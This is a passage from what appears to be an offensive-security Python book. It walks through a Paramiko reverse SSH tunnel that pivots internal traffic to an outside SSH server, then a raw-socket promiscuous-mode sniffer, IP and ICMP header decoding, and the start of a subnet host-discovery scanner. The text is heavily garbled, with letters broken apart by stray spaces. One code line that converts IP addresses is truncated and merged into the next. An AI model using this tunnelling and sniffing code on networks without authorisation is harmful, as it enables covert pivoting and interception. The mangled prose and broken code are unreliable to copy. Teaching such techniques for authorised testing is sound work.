➌ and w e r u n a c o m mand
➍ . W e d on’t s e e a nyth in g i n
th e S SH c lie nt, b ut th e c o m mand w e s e nt i s e xecute d o n th e c lie nt
➎ a nd th e o utp ut i s s e nt to o ur S SH
se rv er
➏ .

SSH T u nnelin g
SSH tu nnelin g i s a m azin g b ut c an b e c o nfu sin g to u nd ers ta nd a nd c o nfig ure , e sp ecia lly w hen d ealin g
with a r e v ers e S SH tu nnel.
Recall th at o ur g o al i n a ll o f th is i s to r u n c o m mand s th at w e ty p e i n a n S SH c lie nt o n a r e m ote S SH
se rv er. W hen u sin g a n S SH tu nnel, i n ste ad o f ty p ed c o m mand s b ein g s e nt to th e s e rv er, n etw ork tr a ffic
is s e nt p ackaged i n sid e o f S SH a nd th en u np ackaged a nd d eliv ere d b y th e S SH s e rv er.
Im agin e th at y o u’re i n th e f o llo w in g s itu ati o n: Y ou h av e r e m ote a ccess to a n S SH s e rv er o n a n
in te rn al n etw ork , b ut y o u w ant a ccess to th e w eb s e rv er o n th e s a m e n etw ork . Y ou c an’t a ccess th e
web s e rv er d ir e ctl y , b ut th e s e rv er w ith S SH i n sta lle d d oes h av e a ccess a nd th e S SH s e rv er d oesn ’t
hav e th e to ols y o u w ant to u se i n sta lle d o n i t.
One w ay to o verc o m e th is p ro ble m i s to s e t u p a f o rw ard S SH tu nnel. W ith o ut g etti n g i n to to o m uch
deta il, r u nnin g th e c o m mand
ssh -L 8008:web:80 justin@sshserver
w ill c o nnect to th e s sh
se rv er a s th e u se r
justin
a nd s e t u p p ort 8 008 o n y o ur l o cal s y ste m . A nyth in g s e nt to p ort 8 008 w ill
be s e nt d ow n th e e xis ti n g S SH tu nnel to th e S SH s e rv er a nd d eliv ere d to th e w eb s e rv er.
Fig ure 2 -2
sh o w s th is i n a cti o n.
Fig ure 2 -2 . S SH f o rw ard tu nnelin g
That’ s p re tty c o ol, b ut r e call th at n o t m any W in d ow s s y ste m s a re r u nnin g a n S SH s e rv er s e rv ic e. N ot
all i s l o st, th o ugh. W e c an c o nfig ure a r e v ers e S SH tu nnellin g c o nnecti o n. I n th is c ase , w e c o nnect to
our o w n S SH s e rv er f r o m th e W in d ow s c lie nt i n th e u su al f a sh io n. T hro ugh th at S SH c o nnecti o n, w e
als o s p ecify a r e m ote p ort o n th e S SH s e rv er th at w ill b e tu nnelle d to th e l o cal h o st a nd p ort ( a s
sh o w n i n
Fig ure 2 -3
). T his
lo cal h o st a nd p ort c an b e u se d , f o r e xam ple , to e xp ose p ort 3 389 to
access a n i n te rn al s y ste m u sin g r e m ote d esk to p, o r to a no th er s y ste m th at th e W in d ow s c lie nt c an
access ( lik e th e w eb s e rv er i n o ur e xam ple ).

Fig ure 2 -3 . S SH r e verse tu nnelin g
The P ara m ik o d em o f ile s i n clu d e a f ile c alle d
rfo rw ard .p y
th at d oes e xactl y th is . I t w ork s p erfe ctl y a s
is s o I w on’t j u st r e p rin t th at f ile , b ut I w ill p oin t o ut a c o up le o f i m porta nt p oin ts a nd r u n th ro ugh a n
exam ple o f h o w to u se i t. O pen
rfo rw ard .p y
, s k ip d ow n to
main()
, a nd f o llo w a lo ng.
def main():
➊ options, server, remote = parse_options()
password = None
if options.readpass:
password = getpass.getpass('Enter SSH password: ')
➋ client = paramiko.SSHClient()
client.load_system_host_keys()
client.set_missing_host_key_policy(paramiko.WarningPolicy())
verbose('Connecting to ssh host %s:%d ...' % (server[0], server[1]))
try:
client.connect(server[0], server[1], username=options.user,
key_filename=options.keyfile,
look_for_keys=options.look_for_keys, password=password)
except Exception as e:
print('*** Failed to connect to %s:%d: %r' % (server[0], server[1], e))
sys.exit(1)
verbose('Now forwarding remote port %d to %s:%d ...' % (options.port,
remote[0], remote[1]))
try:
➌ reverse_forward_tunnel(options.port, remote[0], remote[1],
client.get_transport())
except KeyboardInterrupt:
print('C-c: Port forwarding stopped.')
sys.exit(0)
The f e w l in es a t th e to p
➊ d oub le -c heck to m ake s u re a ll th e n ecessa ry a rg um ents a re p asse d to th e
sc rip t b efo re s e tti n g u p th e P arm akio S SH c lie nt c o nnecti o n
➋ ( w hic h s h o uld l o ok v ery f a m ilia r).
The f in al s e cti o n i n
main()
c alls th e
reverse_forward_tunnel
f u ncti o n
➌ .
Let’ s h av e a l o ok a t th at f u ncti o n.
def reverse_forward_tunnel(server_port, remote_host, remote_port, transport):
➍ transport.request_port_forward('', server_port)
while True:
➎ chan = transport.accept(1000)
if chan is None:
continue

➏ thr = threading.Thread(target=handler, args=(chan, remote_host, .
remote_port))
thr.setDaemon(True)
thr.start()
In P ara m ik o , th ere a re tw o m ain c o m munic ati o n m eth o ds:
transport
, w hic h i s r e sp onsib le f o r
makin g a nd m ain ta in in g th e e ncry p te d c o nnecti o n, a nd
channel
, w hic h a cts l ik e a s o ck f o r s e nd in g
and r e ceiv in g d ata o ver th e e ncry p te d tr a nsp ort s e ssio n. H ere w e s ta rt to u se P ara m ik o ’s
request_port_forward
to f o rw ard T C P c o nnecti o ns f r o m a p ort
➍ o n th e S SH s e rv er a nd s ta rt u p a
new tr a nsp ort c hannel
➎ . T hen, o ver th e c hannel, w e c all th e f u ncti o n h and le r
➏ .
But w e’re n o t d one y et.
def handler(chan, host, port):
sock = socket.socket()
try:
sock.connect((host, port))
except Exception as e:
verbose('Forwarding request to %s:%d failed: %r' % (host, port, e))
return
verbose('Connected! Tunnel open %r -> %r -> %r' % (chan.origin_addr, .
chan.getpeername(), .
(host, port)))
➐ while True:
r, w, x = select.select([sock, chan], [], [])
if sock in r:
data = sock.recv(1024)
if len(data) == 0:
break
chan.send(data)
if chan in r:
data = chan.recv(1024)
if len(data) == 0:
break
sock.send(data)
chan.close()
sock.close()
verbose('Tunnel closed from %r' % (chan.origin_addr,))
And f in ally , th e d ata i s s e nt a nd r e ceiv ed
➐ .
Let’ s g iv e i t a tr y .

Kic k in g t h e T ir e s
We w ill r u n
rfo rw ard .p y
f r o m o ur W in d ow s s y ste m a nd c o nfig ure i t to b e th e m id dle m an a s w e
tu nnel tr a ffic f r o m a w eb s e rv er to o ur K ali S SH s e rv er.
C:\tmp\demos>
rforward.py 192.168.100.133 -p 8080 -r 192.168.100.128:80
--user justin --password
Enter SSH password:
Connecting to ssh host 192.168.100.133:22 ...
C:\Python27\lib\site-packages\paramiko\client.py:517: UserWarning: Unknown
ssh-r
sa host key for 192.168.100.133: cb28bb4e3ec68e2af4847a427f08aa8b
(key.get_name(), hostname, hexlify(key.get_fingerprint())))
Now forwarding remote port 8080 to 192.168.100.128:80 ...
You c an s e e th at o n th e W in d ow s m achin e, I m ad e a c o nnecti o n to th e S SH s e rv er a t 1 92.1 68.1 00.1 33
and o pened p ort 8 080 o n th at s e rv er, w hic h w ill f o rw ard tr a ffic to 1 92.1 68.1 00.1 28 p ort 8 0. S o n o w
if I b ro w se to
http ://1 27.0 .0 .1 :8 080
o n m y L in ux s e rv er, I c o nnect to th e w eb s e rv er a t
192.1 68.1 00.1 28 th ro ugh th e S SH tu nnel, a s s h o w n i n
Fig ure 2 -4
.
Fig ure 2 -4 . R everse S SH tu nnel e xa m ple
If y o u f lip b ack to th e W in d ow s m achin e, y o u c an a ls o s e e th e c o nnecti o n b ein g m ad e i n P ara m ik o :
Connected! Tunnel open (u'127.0.0.1', 54537) -> ('192.168.100.133', 22) ->
('192.168.100.128', 80)
SSH a nd S SH tu nnellin g a re i m porta nt to u nd ers ta nd a nd u se . K no w in g w hen a nd h o w to S SH a nd
SSH tu nnel i s a n i m porta nt s k ill f o r b la ck h ats , a nd P ara m ik o m akes i t p ossib le to a d d S SH
cap ab iliti e s to y o ur e xis ti n g P yth o n to ols .
We’v e c re ate d s o m e v ery s im ple y et v ery u se fu l to ols i n th is c hap te r. I e nco ura ge y o u to e xp and a nd
modify a s n ecessa ry . T he m ain g o al i s to d ev elo p a f ir m g ra sp o f u sin g P yth o n n etw ork in g to c re ate
to ols th at y o u c an u se d urin g p enetr a ti o n te sts , p ost- e xp lo ita ti o n, o r w hile b ug-h unti n g. L et’ s m ove o n
to u sin g r a w s o ckets a nd p erfo rm in g n etw ork s n iffin g, a nd th en w e’ll c o m bin e th e tw o to c re ate a p ure
Pyth o n h o st d is c o very s c anner.
[ 5 ]
The f u ll s o cket d ocum enta tio n c an b e f o und h ere :
http ://d ocs.p yth on.o rg /2 /lib ra ry /s o ck et.h tm l
.
[ 6 ]
This d is c ussio n e xpands o n th e w ork b y H ussa m K hra is , w hic h c an b e f o und o n
http ://r e so urc es.in fo se cin stitu te .c o m /
.

Chap te r 3 . T he N etw ork : R aw S ock ets a n d
Snif fin g
Netw ork s n iffe rs a llo w y o u to s e e p ackets e nte rin g a nd e xiti n g a ta rg et m achin e. A s a r e su lt, th ey h av e
many p ra cti c al u se s b efo re a nd a fte r e xp lo ita ti o n. I n s o m e c ase s, y o u’ll b e a b le to u se W ir e sh ark
( http ://w ir e sh ark .o rg /
) to m onito r tr a ffic , o r u se a P yth o nic s o lu ti o n l ik e S cap y ( w hic h w e’ll e xp lo re
in th e n ext c hap te r). N ev erth ele ss, th ere ’s a n a d vanta ge to k no w in g h o w to th ro w to geth er a q uic k
sn iffe r to v ie w a nd d eco de n etw ork tr a ffic . W riti n g a to ol l ik e th is w ill a ls o g iv e y o u a d eep
ap pre cia ti o n f o r th e m atu re to ols th at c an p ain le ssly ta ke c are o f th e f in er p oin ts w ith l ittl e e ffo rt o n
yo ur p art. Y ou w ill a ls o l ik ely p ic k u p s o m e n ew P yth o n te chniq ues a nd p erh ap s a b ette r
und ers ta nd in g o f h o w th e l o w -le v el n etw ork in g b its w ork .
In th e p re v io us c hap te r, w e c o vere d h o w to s e nd a nd r e ceiv e d ata u sin g T C P a nd U D P, a nd a rg uab ly
th is i s h o w y o u w ill i n te ra ct w ith m ost n etw ork s e rv ic es. B ut u nd ern eath th ese h ig her-le v el p ro to co ls
are th e f u nd am enta l b uild in g b lo cks o f h o w n etw ork p ackets a re s e nt a nd r e ceiv ed . Y ou w ill u se r a w
so ckets to a ccess l o w er-le v el n etw ork in g i n fo rm ati o n s u ch a s th e r a w I P a nd I C M P h ead ers . I n o ur
case , w e a re o nly i n te re ste d i n th e I P l a yer a nd h ig her, s o w e w on’t d eco de a ny E th ern et i n fo rm ati o n.
Of c o urs e , i f y o u i n te nd to p erfo rm a ny l o w -le v el a tta cks s u ch a s A RP p ois o nin g o r y o u a re
dev elo pin g w ir e le ss a sse ssm ent to ols , y o u n eed to b eco m e i n ti m ate ly f a m ilia r w ith E th ern et f r a m es
and th eir u se .
Let’ s b egin w ith a b rie f w alk th ro ugh o f h o w to d is c o ver a cti v e h o sts o n a n etw ork s e gm ent.

Build in g a U DP H ost D is c o very T ool
The m ain g o al o f o ur s n iffe r i s to p erfo rm U D P-b ase d h o st d is c o very o n a ta rg et n etw ork . A tta ckers
want to b e a b le to s e e a ll o f th e p ote nti a l ta rg ets o n a n etw ork s o th at th ey c an f o cus th eir
re co nnais sa nce a nd e xp lo ita ti o n a tte m pts .
We’ll u se a k no w n b ehav io r o f m ost o pera ti n g s y ste m s w hen h and lin g c lo se d U D P p orts to d ete rm in e
if th ere i s a n a cti v e h o st a t a p arti c ula r I P a d dre ss. W hen y o u s e nd a U D P d ata gra m to a c lo se d p ort
on a h o st, th at h o st ty p ic ally s e nd s b ack a n I C M P m essa ge i n d ic ati n g th at th e p ort i s u nre achab le . T his
IC M P m essa ge i n d ic ate s th at th ere i s a h o st a liv e b ecause w e’d a ssu m e th at th ere w as n o h o st i f w e
did n’t r e ceiv e a r e sp onse to th e U D P d ata gra m . I t i s e sse nti a l th at w e p ic k a U D P p ort th at w ill n o t
lik ely b e u se d , a nd f o r m axim um c o vera ge w e c an p ro be s e v era l p orts to e nsu re w e a re n’t h itti n g a n
acti v e U D P s e rv ic e.
Why U D P? T here ’s n o o verh ead i n s p ra yin g th e m essa ge a cro ss a n e nti r e s u b net a nd w aiti n g f o r th e
IC M P r e sp onse s to a rriv e a cco rd in gly . T his i s q uite a s im ple s c anner to b uild w ith m ost o f th e w ork
go in g i n to d eco din g a nd a naly zin g th e v ario us n etw ork p ro to co l h ead ers . W e w ill i m ple m ent th is h o st
sc anner f o r b oth W in d ow s a nd L in ux to m axim iz e th e l ik elih o od o f b ein g a b le to u se i t i n sid e a n
ente rp ris e e nv ir o nm ent.
We c o uld a ls o b uild a d diti o nal l o gic i n to o ur s c anner to k ic k o ff f u ll N map p ort s c ans o n a ny h o sts w e
dis c o ver to d ete rm in e i f th ey h av e a v ia b le n etw ork a tta ck s u rfa ce. T hese a re e xerc is e s l e ft f o r th e
re ad er, a nd I l o ok f o rw ard to h earin g s o m e o f th e c re ati v e w ays y o u c an e xp and th is c o re c o ncep t.
Let’ s g et s ta rte d .

Pack et S nif fin g o n W in dow s a n d L in ux
Accessin g r a w s o ckets i n W in d ow s i s s lig htl y d iffe re nt th an o n i ts L in ux b re th re n, b ut w e w ant to
hav e th e f le xib ility to d ep lo y th e s a m e s n iffe r to m ulti p le p la tf o rm s. W e w ill c re ate o ur s o cket o bje ct
and th en d ete rm in e w hic h p la tf o rm w e a re r u nnin g o n. W in d ow s r e q uir e s u s to s e t s o m e
ad diti o nal
fla gs th ro ugh a s o cket i n p ut/ o utp ut c o ntr o l ( IO CTL),
[ 7 ]
w hic h e nab le s p ro m is c uo us m ode o n th e
netw ork i n te rfa ce. I n o ur f ir s t e xam ple , w e s im ply s e t u p o ur r a w s o cket s n iffe r, r e ad i n a s in gle
packet, a nd th en q uit.
import socket
import os
# host to listen on
host = "192.168.0.196"
# create a raw socket and bind it to the public interface
if os.name == "nt":
➊ socket_protocol = socket.IPPROTO_IP
else:
socket_protocol = socket.IPPROTO_ICMP
sniffer = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket_protocol)
sniffer.bind((host, 0))
# we want the IP headers included in the capture
➋ sniffer.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1)
# if we're using Windows, we need to send an IOCTL
# to set up promiscuous mode
➌ if os.name == "nt":
sniffer.ioctl(socket.SIO_RCVALL, socket.RCVALL_ON)
# read in a single packet
➍ print sniffer.recvfrom(65565)
# if we're using Windows, turn off promiscuous mode
➎ if os.name == "nt":
sniffer.ioctl(socket.SIO_RCVALL, socket.RCVALL_OFF)
We s ta rt b y c o nstr u cti n g o ur s o cket o bje ct w ith th e p ara m ete rs n ecessa ry f o r s n iffin g p ackets o n o ur
netw ork i n te rfa ce
➊ . T he d iffe re nce b etw een W in d ow s a nd L in ux i s th at W in d ow s w ill a llo w u s to
sn iff a ll i n co m in g p ackets r e gard le ss o f p ro to co l, w here as L in ux f o rc es u s to s p ecify th at w e a re
sn iffin g I C M P. N ote th at w e a re u sin g p ro m is c uo us m ode, w hic h r e q uir e s a d m in is tr a ti v e p riv ile ges o n
Win d ow s o r r o ot o n L in ux. P ro m is c uo us m ode a llo w s u s to s n iff a ll p ackets th at th e n etw ork c ard
se es, e v en th o se n o t d esti n ed f o r y o ur s p ecific h o st. N ext w e s e t a s o cket o pti o n
➋ th at i n clu d es th e
IP h ead ers i n o ur c ap tu re d p ackets . T he n ext s te p
➌ i s to d ete rm in e i f w e a re u sin g W in d ow s, a nd i f
so , w e p erfo rm th e a d diti o nal s te p o f s e nd in g a n I O CTL to th e n etw ork c ard d riv er to e nab le
pro m is c uo us m ode. I f y o u’re r u nnin g W in d ow s i n a v ir tu al m achin e, y o u w ill l ik ely g et a n o ti fic ati o n
th at th e g uest o pera ti n g s y ste m i s e nab lin g p ro m is c uo us m ode; y o u, o f c o urs e , w ill a llo w i t. N ow w e
are r e ad y to a ctu ally p erfo rm
so m e s n iffin g, a nd i n th is c ase w e a re s im ply p rin ti n g o ut th e e nti r e r a w
packet
➍ w ith n o p acket d eco din g. T his i s j u st to te st to m ake s u re w e h av e th e c o re o f o ur s n iffin g
co de w ork in g. A fte r a s in gle p acket i s s n iffe d , w e a gain te st f o r W in d ow s, a nd d is a b le p ro m is c uo us
mode
➎ b efo re e xiti n g th e s c rip t.

Kic k in g t h e T ir e s
Open u p a f r e sh te rm in al o r
cm d.e xe
s h ell u nd er W in d ow s a nd r u n th e f o llo w in g:
python sniffer.py
In a no th er te rm in al o r s h ell w in d ow , y o u c an s im ply p ic k a h o st to p in g. H ere , w e’ll p in g
nosta rc h .c o m
:
ping nostarch.com
In y o ur f ir s t w in d ow w here y o u e xecute d y o ur s n iffe r, y o u s h o uld s e e s o m e g arb le d o utp ut th at c lo se ly
re se m ble s th e f o llo w in g:
('E\x00\x00:\x0f\x98\x00\x00\x80\x11\xa9\x0e\xc0\xa8\x00\xbb\xc0\xa8\x0
0\x01\x04\x01\x005\x00&\xd6d\n\xde\x01\x00\x00\x01\x00\x00\x00\x00\x00\
x00\x08
nostarch
\x03com\x00\x00\x01\x00\x01', ('192.168.0.187', 0))
You c an s e e th at w e h av e c ap tu re d th e i n iti a l I C M P p in g r e q uest d esti n ed f o r
nosta rc h .c o m
( b ase d o n
th e a p peara nce o f th e s tr in g
nostarch.com
). I f y o u a re r u nnin g th is e xam ple o n L in ux, th en y o u w ould
re ceiv e th e r e sp onse f r o m
nosta rc h .c o m
. S niffin g o ne p acket i s n o t o verly u se fu l, s o l e t’ s a d d s o m e
fu ncti o nality to p ro cess m ore p ackets a nd d eco de th eir c o nte nts .

Deco d in g t h e I P L ayer
In i ts c urre nt f o rm , o ur s n iffe r r e ceiv es a ll o f th e I P h ead ers a lo ng w ith a ny h ig her p ro to co ls s u ch a s
TC P, U D P, o r I C M P. T he i n fo rm ati o n i s p acked i n to b in ary f o rm , a nd a s s h o w n a b ove, i s q uite
diffic ult to u nd ers ta nd . W e a re n o w g o in g to w ork o n d eco din g th e I P p orti o n o f a p acket s o th at w e
can p ull u se fu l i n fo rm ati o n o ut s u ch a s th e p ro to co l ty p e ( T C P, U D P, I C M P), a nd th e s o urc e a nd
desti n ati o n I P a d dre sse s. T his w ill b e th e f o und ati o n f o r y o u to s ta rt c re ati n g f u rth er p ro to co l p ars in g
la te r o n.
If w e e xam in e w hat a n a ctu al p acket l o oks l ik e o n th e n etw ork , y o u w ill h av e a n u nd ers ta nd in g o f
ho w w e n eed to d eco de th e i n co m in g p ackets . R efe r to
Fig ure 3 -1
f o r th e m akeup o f a n I P h ead er.
Fig ure 3 -1 . T yp ic a l I P v4 h ea der s tr u ctu re
We w ill d eco de th e e nti r e I P h ead er ( e xcep t th e O pti o ns f ie ld ) a nd e xtr a ct th e p ro to co l ty p e, s o urc e,
and d esti n ati o n I P a d dre ss. U sin g th e P yth o n
ctypes
m odule to c re ate a C -lik e s tr u ctu re w ill a llo w u s
to h av e a f r ie nd ly f o rm at f o r h and lin g th e I P h ead er a nd i ts m em ber f ie ld s. F ir s t, l e t’ s ta ke a l o ok a t
th e C d efin iti o n o f w hat a n I P h ead er l o oks l ik e.
struct ip {
u_char ip_hl:4;
u_char ip_v:4;
u_char ip_tos;
u_short ip_len;
u_short ip_id;
u_short ip_off;
u_char ip_ttl;
u_char ip_p;
u_short ip_sum;
u_long ip_src;
u_long ip_dst;
}
You n o w h av e a n i d ea o f h o w to m ap th e C d ata ty p es to th e I P h ead er v alu es. U sin g C c o de a s a
re fe re nce w hen tr a nsla ti n g to P yth o n o bje cts c an b e u se fu l b ecause i t m akes i t s e am le ss to c o nv ert
th em to p ure P yth o n. O f n o te , th e
ip_hl
a nd
ip_v
f ie ld s h av e a b it n o ta ti o n a d ded to th em ( th e
:4
part) . T his i n d ic ate s th at th ese a re b it f ie ld s, a nd th ey a re 4 b its w id e. W e w ill u se a p ure P yth o n
so lu ti o n to m ake s u re th ese f ie ld s m ap c o rre ctl y s o w e c an a v oid h av in g to d o a ny b it m anip ula ti o n.
Let’ s i m ple m ent o ur I P d eco din g r o uti n e i n to
sn iffe r_ ip _hea der_ deco de.p y
a s s h o w n b elo w .
import socket

import os
import struct
from ctypes import *
# host to listen on
host = "192.168.0.187"
# our IP header
➊ class IP(Structure):
_fields_ = [
("ihl", c_ubyte, 4),
("version", c_ubyte, 4),
("tos", c_ubyte),
("len", c_ushort),
("id", c_ushort),
("offset", c_ushort),
("ttl", c_ubyte),
("protocol_num", c_ubyte),
("sum", c_ushort),
("src", c_ulong),
("dst", c_ulong)
]
def __new__(self, socket_buffer=None):
return self.from_buffer_copy(socket_buffer)
def __init__(self, socket_buffer=None):
# map protocol constants to their names
self.protocol_map = {1:"ICMP", 6:"TCP", 17:"UDP"}
➋ # human readable IP addresses
self.src_address = socket.inet_ntoa(struct.pack(" self.dst_address = socket.inet_ntoa(struct.pack(" # human readable protocol
try:
self.protocol = self.protocol_map[self.protocol_num]
except:
self.protocol = str(self.protocol_num)
# this should look familiar from the previous example
if os.name == "nt":
socket_protocol = socket.IPPROTO_IP
else:
socket_protocol = socket.IPPROTO_ICMP
sniffer = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket_protocol)
sniffer.bind((host, 0))
sniffer.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1)
if os.name == "nt":
sniffer.ioctl(socket.SIO_RCVALL, socket.RCVALL_ON)
try:
while True:
# read in a packet
➌ raw_buffer = sniffer.recvfrom(65565)[0]
# create an IP header from the first 20 bytes of the buffer
➍ ip_header = IP(raw_buffer[0:20])
# print out the protocol that was detected and the hosts
➎ print "Protocol: %s %s -> %s" % (ip_header.protocol, ip_header.src_
address, ip_header.dst_address)
# handle CTRL-C
except KeyboardInterrupt:

# if we're using Windows, turn off promiscuous mode
if os.name == "nt":
sniffer.ioctl(socket.SIO_RCVALL, socket.RCVALL_OFF)
The f ir s t s te p i s d efin in g a P yth o n
ctypes
s tr u ctu re
➊ th at w ill m ap th e f ir s t 2 0 b yte s o f th e r e ceiv ed
buffe r i n to a f r ie nd ly I P h ead er. A s y o u c an s e e, a ll o f th e f ie ld s th at w e i d enti fie d a nd th e p re ced in g
C s tr u ctu re m atc h u p n ic ely . T he
__new__
m eth o d o f th e
IP
c la ss s im ply ta kes i n a r a w b uffe r ( in th is
case , w hat w e r e ceiv e o n th e n etw ork ) a nd f o rm s th e s tr u ctu re f r o m i t. W hen th e
__init__
m eth o d i s
calle d ,
__new__
i s a lr e ad y f in is h ed p ro cessin g th e b uffe r. I n sid e
__init__
, w e a re s im ply d oin g
so m e h o use keep in g to g iv e s o m e h um an r e ad ab le o utp ut f o r th e p ro to co l i n u se a nd th e I P a d dre sse s
➋ .
With o ur f r e sh ly m in te d
IP
s tr u ctu re , w e n o w p ut i n th e l o gic to c o nti n ually r e ad i n p ackets a nd p ars e
th eir i n fo rm ati o n. T he f ir s t s te p i s to r e ad i n th e p acket
➌ a nd th en p ass th e f ir s t 2 0 b yte s
➍ to
in iti a liz e o ur
IP
s tr u ctu re . N ext, w e s im ply p rin t o ut th e i n fo rm ati o n th at w e h av e c ap tu re d
➎ . L et’ s
tr y i t o ut.

Kic k in g t h e T ir e s
Let’ s te st o ut o ur p re v io us c o de to s e e w hat k in d o f i n fo rm ati o n w e a re e xtr a cti n g f r o m th e r a w
packets b ein g s e nt. I d efin ite ly r e co m mend th at y o u d o th is te st f r o m y o ur W in d ow s m achin e, a s y o u
will b e a b le to s e e T C P, U D P, a nd I C M P, w hic h a llo w s y o u to d o s o m e p re tty n eat te sti n g ( o pen u p a
bro w se r, f o r e xam ple ). I f y o u a re c o nfin ed to L in ux, th en p erfo rm th e p re v io us p in g te st to s e e i t i n
acti o n.
Open a te rm in al a nd ty p e:
python sniffer_ip_header_decode.py
Now , b ecause W in d ow s i s p re tty c hatty , y o u’re l ik ely to s e e o utp ut i m med ia te ly . I te ste d th is s c rip t b y
openin g I n te rn et E xp lo re r a nd g o in g to
www.g oogle .c o m
, a nd h ere i s th e o utp ut f r o m o ur s c rip t:
Protocol: UDP 192.168.0.190 -> 192.168.0.1
Protocol: UDP 192.168.0.1 -> 192.168.0.190
Protocol: UDP 192.168.0.190 -> 192.168.0.187
Protocol: TCP 192.168.0.187 -> 74.125.225.183
Protocol: TCP 192.168.0.187 -> 74.125.225.183
Protocol: TCP 74.125.225.183 -> 192.168.0.187
Protocol: TCP 192.168.0.187 -> 74.125.225.183
Because w e a re n’t d oin g a ny d eep i n sp ecti o n o n th ese p ackets , w e c an o nly g uess w hat th is s tr e am i s
in d ic ati n g. M y g uess i s th at th e f ir s t c o up le o f U D P p ackets a re th e D NS q uerie s to d ete rm in e w here
google .c o m
l iv es, a nd th e s u b se q uent T C P s e ssio ns a re m y m achin e a ctu ally c o nnecti n g a nd
dow nlo ad in g c o nte nt f r o m th eir w eb s e rv er.
To p erfo rm th e s a m e te st o n L in ux, w e c an p in g
google .c o m
, a nd th e r e su lts w ill l o ok s o m eth in g l ik e
th is :
Protocol: ICMP 74.125.226.78 -> 192.168.0.190
Protocol: ICMP 74.125.226.78 -> 192.168.0.190
Protocol: ICMP 74.125.226.78 -> 192.168.0.190
You c an a lr e ad y s e e th e l im ita ti o n: w e a re o nly s e ein g th e r e sp onse a nd o nly f o r th e I C M P p ro to co l.
But b ecause w e a re p urp ose fu lly b uild in g a h o st d is c o very s c anner, th is i s c o m ple te ly a ccep ta b le . W e
will n o w a p ply th e s a m e te chniq ues w e u se d to d eco de th e I P h ead er to d eco de th e I C M P m essa ges.

Deco d in g I C M P
Now th at w e c an f u lly d eco de th e I P l a yer o f a ny s n iffe d p ackets , w e h av e to b e a b le to d eco de th e
IC M P r e sp onse s th at o ur s c anner w ill e lic it f r o m s e nd in g U D P d ata gra m s to c lo se d p orts . I C M P
messa ges c an v ary g re atl y i n th eir c o nte nts , b ut e ach m essa ge c o nta in s th re e e le m ents th at s ta y
co nsis te nt: th e ty p e, c o de, a nd c hecksu m f ie ld s. T he ty p e a nd c o de f ie ld s te ll th e r e ceiv in g h o st w hat
ty p e o f I C M P m essa ge i s a rriv in g, w hic h th en d ic ta te s h o w to d eco de i t p ro perly .
For th e p urp ose o f o ur s c anner, w e a re l o okin g f o r a ty p e v alu e o f 3 a nd a c o de v alu e o f 3 . T his
co rre sp ond s to th e
Destination Unreachable
c la ss o f I C M P m essa ges, a nd th e c o de v alu e o f 3
in d ic ate s th at th e
Port Unreachable
e rro r h as b een c ause d . R efe r to
Fig ure 3 -2
f o r a d ia gra m o f a
Destination Unreachable
I C M P m essa ge.
Fig ure 3 -2 . D ia gra m o f
Destination Unreachable
I C M P m essa ge
As y o u c an s e e, th e f ir s t 8 b its a re th e ty p e a nd th e s e co nd 8 b its c o nta in o ur I C M P c o de. O ne
in te re sti n g th in g to n o te i s th at w hen a h o st s e nd s o ne o f th ese I C M P m essa ges, i t a ctu ally i n clu d es th e
IP h ead er o f th e o rig in ati n g m essa ge th at g enera te d th e r e sp onse . W e c an a ls o s e e th at w e w ill d oub le -
check a gain st 8 b yte s o f th e o rig in al d ata gra m th at w as s e nt i n o rd er to m ake s u re o ur s c anner
genera te d th e I C M P r e sp onse . T o d o s o , w e s im ply s lic e o ff th e l a st 8 b yte s o f th e r e ceiv ed b uffe r to
pull o ut th e m agic s tr in g th at o ur s c anner s e nd s.
Let’ s a d d s o m e m ore c o de to o ur p re v io us s n iffe r to i n clu d e th e a b ility to d eco de I C M P p ackets . L et’ s
sa v e o ur p re v io us f ile a s
sn iffe r_ w ith _ic m p.p y
a nd a d d th e f o llo w in g c o de:
--
snip
--class IP(Structure):
--
snip
--
➊ class ICMP(Structure):
_fields_ = [
("type", c_ubyte),
("code", c_ubyte),
("checksum", c_ushort),
("unused", c_ushort),
("next_hop_mtu", c_ushort)
]
def __new__(self, socket_buffer):
return self.from_buffer_copy(socket_buffer)
def __init__(self, socket_buffer):
pass
--
snip
-
print "Protocol: %s %s -> %s" % (ip_header.protocol, ip_header.src_
address, ip_header.dst_address)

# if it's ICMP, we want it
➋ if ip_header.protocol == "ICMP":
# calculate where our ICMP packet starts
➌ offset = ip_header.ihl * 4
buf = raw_buffer[offset:offset + sizeof(ICMP)]
# create our ICMP structure
➍ icmp_header = ICMP(buf)
print "ICMP -> Type: %d Code: %d" % (icmp_header.type, icmp_header.
code)
This s im ple p ie ce o f c o de c re ate s a n
ICMP
s tr u ctu re
➊ u nd ern eath o ur e xis ti n g
IP
s tr u ctu re . W hen th e
main p acket- re ceiv in g l o op d ete rm in es th at w e h av e r e ceiv ed a n I C M P p acket
➋ , w e c alc ula te th e
offs e t i n th e r a w p acket w here th e I C M P b ody l iv es
➌ a nd th en c re ate o ur b uffe r
➍ a nd p rin t o ut th e
type
a nd
code
f ie ld s. T he l e ngth c alc ula ti o n i s b ase d o n th e I P h ead er
ihl
f ie ld , w hic h i n d ic ate s th e
num ber o f 3 2-b it w ord s ( 4 -b yte c hunks) c o nta in ed i n th e I P h ead er. S o b y m ulti p ly in g th is f ie ld b y 4 ,
we k no w th e s iz e o f th e I P h ead er a nd th us w hen th e n ext n etw ork l a yer — I C M P i n th is c ase —
begin s.
If w e q uic kly r u n th is c o de w ith o ur ty p ic al p in g te st, o ur o utp ut s h o uld n o w b e s lig htl y d iffe re nt, a s
sh o w n b elo w :
Protocol: ICMP 74.125.226.78 -> 192.168.0.190
ICMP -> Type: 0 Code: 0
This i n d ic ate s th at th e p in g ( IC M P E cho ) r e sp onse s a re b ein g c o rre ctl y r e ceiv ed a nd d eco ded . W e a re
no w r e ad y to i m ple m ent th e l a st b it o f l o gic to s e nd o ut th e U D P d ata gra m s, a nd to i n te rp re t th eir
re su lts .
Now l e t’ s a d d th e u se o f th e
netaddr
m odule s o th at w e c an c o ver a n e nti r e s u b net w ith o ur h o st
dis c o very s c an. S av e y o ur
sn iffe r_ w ith _ic m p.p y
s c rip t a s
sc a nner.p y
a nd a d d th e f o llo w in g c o de:
import threading
import time
from netaddr import IPNetwork,IPAddress
--
snip
--
# host to listen on
host = "192.168.0.187"
# subnet to target
